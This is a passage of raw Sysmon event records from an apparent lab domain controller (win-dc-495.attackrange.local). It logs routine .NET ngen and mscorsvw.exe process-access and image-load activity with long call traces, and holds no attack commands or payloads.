\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:27.093{59A5CD1D-9133-6005-F001-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9bc-0\Microsoft.VisualC.dll2021-01-18 13:46:27.093 10341000x80000000000000006129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.062{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F001-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.062{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F001-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.062{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F001-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-EF01-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.031{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-EF01-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.015{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-EF01-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.937{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9134-6005-0002-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.937{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9134-6005-0002-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.937{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9134-6005-0002-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.452{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9134-6005-FF01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.452{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9134-6005-FF01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.437{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9134-6005-FF01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9134-6005-FE01-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.015{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9134-6005-FE01-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.015{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9134-6005-FE01-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.796{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0B02-00000000A301}5020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.781{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0B02-00000000A301}5020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.781{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0B02-00000000A301}5020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.718{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0A02-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.703{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0A02-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.703{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0A02-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.546{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0902-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.531{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0902-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 